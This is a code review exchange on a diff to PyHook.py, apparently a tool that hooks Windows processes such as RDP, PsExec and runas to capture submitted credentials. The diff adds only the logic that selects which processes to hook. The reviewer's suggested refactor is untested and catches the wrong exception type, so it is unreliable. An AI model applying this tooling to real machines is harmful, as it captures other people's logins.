PyHook.py

```diff
@@ -62,8 +82,33 @@ def on_credential_submit(message, data):
 
 def main():
     from hooks import rdp, psexec, explorer, cmd, mobaxterm, runas
+    functions = []
+    for process in args.process:
+        if process == "psexec":
+            print("[+] Waiting for psexec")
+            functions.append(psexec.wait_for)
+        elif process == "cmd":
+            print("[+] Waiting for cmd")
+            functions.append(cmd.wait_for)
+        elif process == "mobaxterm":
+            print("[+] Waiting for mobaxterm")
+            functions.append(mobaxterm.wait_for)
+        elif process == "runas":
+            print("[+] Waiting for runas")
+            functions.append(runas.wait_for)
+        elif process == "explorer":
+            print("[+] Waiting for explorer")
+            functions.append(explorer.wait_for)
+        elif process == "mstsc":
+            print("[+] Waiting for mstsc")
+            functions.append(rdp.wait_for)
+        elif process == "all":
+            functions.extend((psexec.wait_for, rdp.wait_for, explorer.wait_for, cmd.wait_for, mobaxterm.wait_for,
+                              runas.wait_for))
+        else:
+            print("[-] The process is not available")
+            exit(1)
```

Comment:
This is a very extensive code for just a simple selection.
Consider using a list to represent the available modules, like so:
```python
import hooks

...

def main():

    ...

    functions = []
    
    hooks_modules = dir(hooks)
    
    for hook_process_name in args.desired_hooks:
        try:
            hook_module = __import__(f"hooks.{hook_process_name}")
            functions.append(hook_module.wait_for)
        except OSError:
            print(f"[-] A module for the selected process is not available - {hook_process_name}")
    
```
This solution will discourage redundant import like this line:
```python
from hooks import rdp, psexec, explorer, cmd, mobaxterm, runas
```

###### *Note - I didn't check the validity of the code so feel free to fix and make adjustments to it*

Reply:
Will do